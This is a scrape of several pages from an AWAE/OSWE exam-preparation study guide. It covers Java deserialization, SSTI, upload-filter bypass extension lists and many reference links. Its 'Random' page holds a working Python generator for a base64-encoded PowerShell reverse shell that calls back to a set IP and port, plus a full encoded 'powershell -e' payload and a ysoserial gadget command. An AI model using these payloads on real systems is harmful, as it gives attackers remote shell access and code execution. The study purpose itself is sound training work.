point[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#entry-point) #### Servlet.java:38 `Serial.fromBase64(data);`[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#servlet.java-38-serial.frombase64-data) This line is calling the class`Serial`, loaded from `Serial.java` passing the data taken from the POST "data" `parameter`. #### Serial Class[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#serial-class) #### Decoding Base64-encoded object[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#decoding-base64-encoded-object) #### Reading Object[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#reading-object) At this time, using `readObject()`, the object is loaded. ### Identifying vulnerable loaded classes[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#identifying-vulnerable-loaded-classes) This webapp is compiled with `commons-collections4:4.0` specified on its classpath. (`target/bin/webapp`:`80`) and it is also listed in ysoserial's vulnerable classes list. ### Ysoserial payload generation[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#ysoserial-payload-generation) [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex) [NextPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice) Last updated 6 years ago * [Structure](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#structure) * [Practising with Ysoserial](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#practising-with-ysoserial) * [Entry point](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#entry-point) * [Identifying vulnerable loaded classes](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#identifying-vulnerable-loaded-classes) * [Ysoserial payload generation](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#ysoserial-payload-generation) Copy public class Serial { public static Object fromBase64(String s) throws IOException, ClassNotFoundException { byte[] data = new Base64().decode(s); ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data)); Object o = ois.readObject(); ois.close(); return o; } public static String toBase64(Serializable o) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(o); oos.close(); return new Base64().encodeToString(baos.toByteArray()); } } Copy byte[] data = new Base64().decode(s); Copy ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data)); Object o = ois.readObject(); Copy java -jar ysoserial.jar CommonsCollections4 'touch /tmp/worked' --- # Random | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random.md) . ### Windows encoded reverse shell (linux only)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random#windows-encoded-reverse-shell-linux-only) Copy python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());' #### Example:[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random#example) Copy powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAuADMALgAzAC4ANwAiACwAMQAzADMANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA= [PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs/practice) [NextOther Repositories](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/resources.md) . [https://klezvirus.github.io/The\_Big\_Problem\_of\_Serialisation/klezvirus.github.io](https://klezvirus.github.io/The_Big_Problem_of_Serialisation/) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/resources) [NextXSS](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss) Last updated 6 years ago --- # XXE | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe.md) . [By Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/resources) [PreviousXSS](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss) [NextBy Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/resources.md) . [XXE - XEE - XML External Entity - HackTricksHackTricks](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity) [XML External Entity (XXE) Processing | OWASP Foundationowasp.org](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) [What Are XML External Entity (XXE) AttacksAcunetix](https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/) [PreviousVulnerable Libraries' Implementation](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation) [NextSSTI](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti) Last updated 6 years ago --- # Other Repositories | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories.md) . English[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories#english) -------------------------------------------------------------------------------------------------- [OSWE/AWAE Preparation: Complete Study Guidez-r0crypt](https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/) [AWAE (OSWE) preparation - HackMDHackMD](https://hackmd.io/@Chivato/Hyflsx0ZI) [GitHub - M507/AWAE-Preparation: This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.GitHub](https://github.com/M507/AWAE-Preparation) [GitHub - piyush-saurabh/oswe: This repository is created for the preparation related to OSWEGitHub](https://github.com/piyush-saurabh/oswe) [HomeGitHub](https://github.com/enderphan94/Pre-OSWE/wiki) [GitHub - sailay1996/offsec\_WE: learning case to prepare OSWEGitHub](https://github.com/sailay1996/offsec_WE) [GitHub - s0j0hn/AWAE-OSWE-PrepGitHub](https://github.com/s0j0hn/AWAE-OSWE-Prep) [GitHub - deletehead/awae\_oswe\_prep: Stuff done in preparation for AWAE course and OSWE certificationGitHub](https://github.com/deletehead/awae_oswe_prep) [GitHub - wetw0rk/AWAE-PREP: This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.GitHub](https://github.com/wetw0rk/AWAE-PREP) [GitHub - zer0byte/AWAE-OSWPGitHub](https://github.com/zer0byte/AWAE-OSWP) Other[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories#other) ---------------------------------------------------------------------------------------------- [https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/cyber-dragon.nl](https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/) [PreviousRandom](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random) Last updated 6 years ago * [English](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories#english) * [Other](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories#other) --- # By Language | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language.md) . [PHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization) [JAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java) [.NET](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net) [PreviousDeserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization) [NextPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization) Last updated 6 years ago --- # PHP | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization.md) . [Regex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/regex) [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/summary) [Practice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice) [PreviousBy Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language) [NextRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/regex) Last updated 6 years ago --- # .NET | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net.md) . [Regex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex) [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/resources) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources) [NextRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex) Last updated 6 years ago --- # Practice | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/practice.md) . [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-267-server-side-template-injectionowasp-skf.gitbook.io](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-267-server-side-template-injection) [GitHub - TROUBLE-1/White-box-pentesting: This lab is created to demonstrate pass-the-hash, blind sql and SSTI vulnerabilitiesGitHub](https://github.com/TROUBLE-1/White-box-pentesting) [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/summary) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources) Last updated 6 years ago --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/summary.md) . The main goal of this vulnerability is to find a place where your input is being sent to the template engine as a variable to be rendered. Then, a valid gadget should be found to end up achieving Remote Code Execution. In a whitebox approach, strings like `render_template_string` can help finding this kind of vulnerability. On the other hand, in a blackbox approach, the most used payload to test for the execution of this vulnerability is `{{7*'7'}}` waiting for the server to answer `7777777` and `{{7*7}}` being `49` the response. [PreviousSSTI](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti) [NextPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/practice) Last updated 6 years ago --- # SSTI | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti.md) . [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/summary) [Practice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/practice) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/resources) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/summary) Last updated 6 years ago --- # JAVA | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java.md) . [Regex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex) [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary) [Practice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources) [PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice) [NextRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex) Last updated 6 years ago --- # Java | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java.md) . [Vulnerable Libraries' Implementation](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/resources) [NextVulnerable Libraries' Implementation](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/resources.md) . [PayloadsAllTheThings/Upload Insecure Files at master · swisskyrepo/PayloadsAllTheThingsGitHub](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files) [Unrestricted File Upload | OWASP Foundationowasp.org](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload) [Bypass file upload filter with .htaccessthibaud-robin.fr](https://thibaud-robin.fr/articles/bypass-filter-upload/) [Unrestricted File Upload Testing & Bypass Techniques - AptiveUnrestricted File Upload Testing & Bypass Techniques](https://www.aptive.co.uk/blog/unrestricted-file-upload-testing/) [Bypassing File Upload RestrictionsPenetration Testing Lab](https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/) [https://book.hacktricks.xyz/pentesting-web/file-uploadbook.hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/file-upload) [Unrestricted File Upload In PHPMedium](https://medium.com/@nyomanpradipta120/unrestricted-file-upload-in-php-b4459eef9698) [PreviousFile Extension Filters Bypass List](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass) [NextREGEX](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources.md) . Articles[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#articles) ----------------------------------------------------------------------------------------------------------------- [Server-Side Template InjectionPortSwigger Research](https://portswigger.net/research/server-side-template-injection) [Client Challengewww.slideshare.net](https://www.slideshare.net/Amit7428/serverside-template-injection) Writeups[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#writeups) ----------------------------------------------------------------------------------------------------------------- [TokyoWesterns CTF 4th 2018 Writeup — Part 3Medium](https://medium.com/bugbountywriteup/tokyowesterns-ctf-4th-2018-writeup-part-3-1c8510dfad3f) [https://medium.com/bugbountywriteup/x-mas-2019-ctf-write-up-mercenary-hat-factory-ssti-53e82d58829emedium.com](https://medium.com/bugbountywriteup/x-mas-2019-ctf-write-up-mercenary-hat-factory-ssti-53e82d58829e) [CTFtime.org / HackIT CTF 2018 / Believer Case / WriteupCTFtime](https://ctftime.org/writeup/11014) [Facebook CTF 2019 Writeup: events – Template Injection and Cookie Forgery | Raihan Ramadistraramadistra.dev](https://ramadistra.dev/fbctf-2019-events) CheatSheets[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#cheatsheets) ----------------------------------------------------------------------------------------------------------------------- ### Jinja2[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#jinja2) [Cheatsheet - Flask & Jinja2 SSTIpequalsnp-team.github.io](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) [PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/practice) [NextFile Upload Restrictions Bypass](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass) Last updated 6 years ago * [Articles](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#articles) * [Writeups](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#writeups) * [CheatSheets](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#cheatsheets) * [Jinja2](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources#jinja2) --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources.md) . Cheatsheets[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#cheatsheets) -------------------------------------------------------------------------------------------------------------------------------- [SQL Injection Cheat Sheet 2026 With Live ExamplesLearn Ethical Hacking and Penetration Testing Online](https://www.hackingloops.com/sql-injection-cheat-sheet) Beginner[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#beginner) -------------------------------------------------------------------------------------------------------------------------- [SQLCourse: Beginner & Advanced Interactive SQL TutorialsSQL Course](http://www.sqlcourse.com/) Intermediate - Advanced[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#intermediate-advanced) ------------------------------------------------------------------------------------------------------------------------------------------------------ [Advanced Course | SQL CourseSQL Course](http://www.sqlcourse2.com/) [SQLBolt - Learn SQL - Introduction to SQLSQLBolt - Learn SQL with simple, interactive exercises.](https://sqlbolt.com/) WriteUps[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#writeups) -------------------------------------------------------------------------------------------------------------------------- [https://twitter.com/jorge\_ctf/status/1290229578431000578twitter.com](https://twitter.com/jorge_ctf/status/1290229578431000578) [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex) [NextDeserialization](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization) Last updated 5 years ago * [Cheatsheets](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#cheatsheets) * [Beginner](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#beginner) * [Intermediate - Advanced](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#intermediate-advanced) * [WriteUps](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources#writeups) --- # By Language | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language.md) . [PHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php) [Java](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java) [PreviousXXE](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe) [NextPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php) Last updated 6 years ago --- # Compiling & Running | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running.md) . Hello World example[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#hello-world-example) ---------------------------------------------------------------------------------------------------------------------------------------------- `HelloWorld.java` (Filename must match class' name) Copy public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World."); } } ### Compiling[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#compiling) Copy javac HelloWorld.java ### Executing[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#executing) Copy java HelloWorld [PreviousDecompiling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling) [NextNodeJS](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs) Last updated 6 years ago * [Hello World example](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#hello-world-example) * [Compiling](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#compiling) * [Executing](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running#executing) --- # File Upload Restrictions Bypass | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass.md) . [Tricks](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks) [File Extension Filters Bypass List](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/resources) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources) [NextTricks](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks) Last updated 6 years ago --- # NodeJS | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs.md) . [Practice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs/practice) [PreviousCompiling & Running](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running) [NextPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs/practice) Last updated 6 years ago --- # File Extension Filters Bypass List | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass.md) . PHP[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#php) ------------------------------------------------------------------------------------------------------------------------------------------------------ * .php * .pht * .phtm * .phtml * .phar * .phpt * .pgif * .phps * .phtml * .php2 * .php3 * .php4 * .php5 * .php6 * .php7 * .php16 * .inc ASP[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#asp) ------------------------------------------------------------------------------------------------------------------------------------------------------ * .asp * .aspx * .cer * .asa PERL[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#perl) -------------------------------------------------------------------------------------------------------------------------------------------------------- * .pl * .pm * .cgi * .lib JSP[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#jsp) ------------------------------------------------------------------------------------------------------------------------------------------------------ * .jsp * .jspx * .jsw * .jsv * .jspf [PreviousTricks](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/resources) Last updated 6 years ago * [PHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#php) * [ASP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass#asp) * 